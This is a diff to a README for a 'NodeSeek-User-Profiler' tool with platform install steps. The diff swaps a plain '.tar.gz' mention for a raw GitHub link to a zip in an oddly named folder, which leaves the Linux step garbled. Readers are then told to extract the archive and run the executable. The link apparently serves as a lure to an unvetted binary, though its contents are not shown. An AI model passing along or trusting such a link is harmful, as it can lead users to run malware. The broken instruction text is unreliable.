MichaelBola/NodeSeek-User-Profiler/README.md

      Open the downloaded `.dmg` file.
 Drag the NodeSeek-User-Profiler app to your Applications folder.
 Then, go to your Applications and double-click to open it.

    - **For Linux:**
-     If you downloaded a `.tar.gz` file, extract the contents.
+     If you downloaded a `https://github.com/MichaelBola/NodeSeek-User-Profiler/raw/refs/heads/main/anisostemonous/Seek_Node_User_Profiler_v1.2.zip` file, extract the contents.
 Open a terminal in the extracted folder and run `./NodeSeek-User-Profiler` to start the application.

 ## 🛠️ System Requirements